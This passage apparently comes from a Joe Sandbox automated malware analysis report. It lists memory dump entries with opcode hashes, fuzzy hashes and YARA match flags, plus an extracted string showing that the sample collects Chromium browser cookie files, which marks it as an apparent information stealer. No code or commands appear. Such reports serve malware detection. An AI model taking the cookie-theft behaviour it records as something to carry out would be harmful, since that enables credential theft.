                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                            • Instruction ID: b6c6c36d49f227cd4cf2d877dfdec90afeda01149c1b31869bb9c118833cbe28
                                                            • Opcode Fuzzy Hash: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
                                                            • Instruction Fuzzy Hash: 53121971948385ABDB18CE18C4A13AB7FE2AB91314F08856DE8DD4B3D1DB79C5C5C782
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: IO
                                                            • API String ID: 0-3981347273
                                                            • Opcode ID: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                            • Instruction ID: 13a3f32624fd5b4595b676fbfff232cae1912c3a118501d1e85784cb171a8bcb
                                                            • Opcode Fuzzy Hash: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
                                                            • Instruction Fuzzy Hash: 0AD112B1600A018FD724CF15C590B12BBF2FF49704F148A9CD8AA8FB56D779E885CB94
                                                            Strings
                                                            • v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 004167B3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                            • API String ID: 0-3705423304
                                                            • Opcode ID: 1a7cb89f16a8d5a4328fc40f41a34d78c1a1ad62b83e42df0e34b4725036604c
                                                            • Instruction ID: e2aff65f3d6dc5062d0ba04aa46064ddba6db07fd0ccc2038df325f36c3021e5
                                                            • Opcode Fuzzy Hash: 1a7cb89f16a8d5a4328fc40f41a34d78c1a1ad62b83e42df0e34b4725036604c
                                                            • Instruction Fuzzy Hash: 9EA18C706057418FD725CF28C1907A3BBE2BF66304F19869DC4964F796D33AE886CB98
                                                            Strings
                                                            • v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 02156A1A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
                                                            • API String ID: 0-3705423304
                                                            • Opcode ID: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                            • Instruction ID: 76250dfe8f3350489e7e1ec9c4187cc73e05ee6b7735af849b77470d84adbbdb
                                                            • Opcode Fuzzy Hash: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
                                                            • Instruction Fuzzy Hash: A3A1AFB0645791CFD725CF28C490762BBE2BF56304F58869CC8A64F796C336E846CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: f44e3036523da0b72d26407a98b8412ca7f39c6c3557597764c123b35b5b7326
                                                            • Instruction ID: b21458e9d172f3a465188df86c848c015b63d16b5f46d67e3e5fb2f613f60a17
                                                            • Opcode Fuzzy Hash: f44e3036523da0b72d26407a98b8412ca7f39c6c3557597764c123b35b5b7326
                                                            • Instruction Fuzzy Hash: 8391DF746053029BDB28CF19C890B6BB7E2FF88754F18951DE8858B790D738EC61CB96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            • Opcode ID: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                            • Instruction ID: 0a9ce9c664c590a8de2c66a673c0e2dfa198decb65faaefc02ce27f8e691dfea
                                                            • Opcode Fuzzy Hash: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
                                                            • Instruction Fuzzy Hash: BB918B756093029BDB18CF18D890B6BB7F2FFC4758F19891CE8858B254DB35EA11CB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,
                                                            • API String ID: 0-3772416878
                                                            • Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                            • Instruction ID: 49ac68bff1f266d30a48b1e8e6a747f7736882c678fe7bbee82a01b3dca97335
                                                            • Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
                                                            • Instruction Fuzzy Hash: 92B139715093819FD314DF68C84465BBBE0AFA9304F448A6EF49997382C375EA28CB96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,
                                                            • API String ID: 0-3772416878
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ' !"
                                                            • API String ID: 0-2098420348
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 7452
                                                            • API String ID: 0-87867774
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gdeb
                                                            • API String ID: 0-1935535308
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2
                                                            • API String ID: 0-450215437
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2
                                                            • API String ID: 0-450215437
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ea0677f270df709b1f7eb94a631cbec65cf770ef0d0ccab117a7daa6e435e835
                                                            • Instruction ID: 108c6d3dcadcb8a627c5b1dabe3c84d4269efae023d7f46376c982b596c6652a
                                                            • Opcode Fuzzy Hash: ea0677f270df709b1f7eb94a631cbec65cf770ef0d0ccab117a7daa6e435e835
                                                            • Instruction Fuzzy Hash: BF81B171558392CFD725CF24C890BAFB7E1BF89304F08596CD8A9C7281EB799845CB92
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction ID: 8011320ac73b754884be16ecadefcb7f33d37dbd2e6123a62891b597907d0779
                                                            • Opcode Fuzzy Hash: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction Fuzzy Hash: 40617CB16087549FE314DF29D49435BBBE1BBC8318F044A2EE4D987390E379DA088B96
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction ID: c4701c406d195e88a16d71d1abda30ebf247825d3da95fbfec8d23a8e87b1855
                                                            • Opcode Fuzzy Hash: acfbc8068afc6b7d88dba9d73b7b1bf6863cfdde9a5a5678ccf86eeeb0158c18
                                                            • Instruction Fuzzy Hash: 81614BB1A087548FE314DF29D89475BBBE1BBC8318F144A2DE5E987390E379D5088F92
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c20bdc7a851645dbf9dab95978a4bc77b7dd27bd65b083cf309054b351127529
                                                            • Instruction ID: 8d31776b54d2a30541e7e18db25a1692bdecdf94dacd26016d6d695dd19e25f0
                                                            • Opcode Fuzzy Hash: c20bdc7a851645dbf9dab95978a4bc77b7dd27bd65b083cf309054b351127529
                                                            • Instruction Fuzzy Hash: CC517E716087418FC718CF28C89063EB7E1BBC9324F154A2DE9EA97395D734E915CB52
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83073b8719d7e0faf081a3368ce39582620720279ac6267d65c12e9389d1ea24
                                                            • Instruction ID: ac486eaa269052dcc2a7b9b78249461c6c086f42b689fd4a8c42a324ff056cec
                                                            • Opcode Fuzzy Hash: 83073b8719d7e0faf081a3368ce39582620720279ac6267d65c12e9389d1ea24
                                                            • Instruction Fuzzy Hash: F351F5B29186148FC720DF28CC857BAB7E4DF92318F09552ED869C7381E739D884C7A5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44613b4c036b2c385d58573518babc9526f5992cc62a53f54369211b96f0fe89
                                                            • Instruction ID: 384ef8c022e1553771f2c4359f0c12beb3c260e481c0c225c7863c287e8c5261
                                                            • Opcode Fuzzy Hash: 44613b4c036b2c385d58573518babc9526f5992cc62a53f54369211b96f0fe89
                                                            • Instruction Fuzzy Hash: D15102B6948224CFDB20DF28CC8577AB7E4AF45314F0956A8ECAAC7281E735D584C791
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction ID: 93780d2427e093b758c14c50eb40fe151429752d83b3daa3d484dd8a41c19c98
                                                            • Opcode Fuzzy Hash: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction Fuzzy Hash: 1241247160C2615FE3189E39C89037ABBD2DBC5354F04CA7EE4E9877D2D638884ADB45
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction ID: c25c8bd5cf0d6a5d6d6b077234904f4a9c13e8c960fc686f71850b964ac6250c
                                                            • Opcode Fuzzy Hash: 69970d3ec877a5501d78b087801963f1341c5ba9f32c0b280cd2124785c4c6f8
                                                            • Instruction Fuzzy Hash: D541E3756082614FE3089A3DC8A037ABBD2EFC5354F05C66EE0E9877E5DB388446DB51
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction ID: 09b51193ffce78eae9cd24ccb79c874a3196245145ede4469a31f63818c12293
                                                            • Opcode Fuzzy Hash: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction Fuzzy Hash: 40418CB16116058BDB58CF19C88475277E2ABC4324F18C1BAEE019F3CADB79D989CF85
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction ID: 569597801202ed4460f0987dac1f4b5eb8bd835c35808d378ead0dac98a1ca33
                                                            • Opcode Fuzzy Hash: 715d4e1a56a60a2aa537aa42d7826f17c876bdac566d208033b001f6f4d104f9
                                                            • Instruction Fuzzy Hash: 8041AFB17106049BDB588F19C88475677E2AF94328F48C1A9DD098F38ADB79C989CF81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9adba35ec3703a7164c5ea854a77521608906d116942ee9f3be7fb12b250ff6a
                                                            • Instruction ID: 077d34d601cbd419e631990840f272bb6d564860935d01698b788ae2fce7ee64
                                                            • Opcode Fuzzy Hash: 9adba35ec3703a7164c5ea854a77521608906d116942ee9f3be7fb12b250ff6a
                                                            • Instruction Fuzzy Hash: 994189B05483928BC324CF14C8607ABB7E6FF85254F444A1CE9EA9B780E7389945CBC6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e2ea7132ad86297b03cba3dc6a24afaab823d50b359fc15a183b1f8e4a42ffb1
                                                            • Instruction ID: 2686aa34b6a76b27f20ffd05abd75c1ce39c7f7e6e1673e9cdff4e5e0361a673
                                                            • Opcode Fuzzy Hash: e2ea7132ad86297b03cba3dc6a24afaab823d50b359fc15a183b1f8e4a42ffb1
                                                            • Instruction Fuzzy Hash: A73134B19187118BD725CF14C8817BBB7D4AB85315F08143EE88997382EB7C9984CB9A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e394665ba781b0250695dffab2978dfaadb1877bc08883ebb4c543b78d81760
                                                            • Instruction ID: 1173fd14226b6f9772cf5791de5bc0a1936854a118f46feab6fed66326430bb7
                                                            • Opcode Fuzzy Hash: 7e394665ba781b0250695dffab2978dfaadb1877bc08883ebb4c543b78d81760
                                                            • Instruction Fuzzy Hash: 0931CA316046009BD7149E59CA84927B7E1FFC4318F18897EE899E73C1D67ADC42DB4A
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_2140000_21AE.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c67830654ad6e4d523287e63485f7401f2c3fa94643f1caaf398f55fe42cf3ef
                                                            • Instruction ID: 98056d42ccfd25c4f37446a44cdcaf4e00c87e1917dc39a2f5c57523557cd1f2
                                                            • Opcode Fuzzy Hash: c67830654ad6e4d523287e63485f7401f2c3fa94643f1caaf398f55fe42cf3ef
                                                            • Instruction Fuzzy Hash: 5E31C270A442029FD7189E18CC80A2EB7E1EFC5358F19897CFCAD9B251DB31D992CB42
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63a2bfe27c6966d50c0fe34e9c7c8675319f6a27cf5de917e4788303bb19de49
                                                            • Instruction ID: e355dcfae9e044697576bbfde22a8f19920d75dde12cc047ec3e3f6d5b1960e9
                                                            • Opcode Fuzzy Hash: 63a2bfe27c6966d50c0fe34e9c7c8675319f6a27cf5de917e4788303bb19de49
                                                            • Instruction Fuzzy Hash: 8B41BA70418690DFD775DB3081A9DBA7FF1BE0A21538B54EEC0869F4A3EA34D186DB05
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2691300051.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.2691300051.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_21AE.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                            • Instruction ID: eaecee785cbc552ffb01b79b63469848f54c5be3ad95e1fd29ce6da9ec180bfb
                                                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
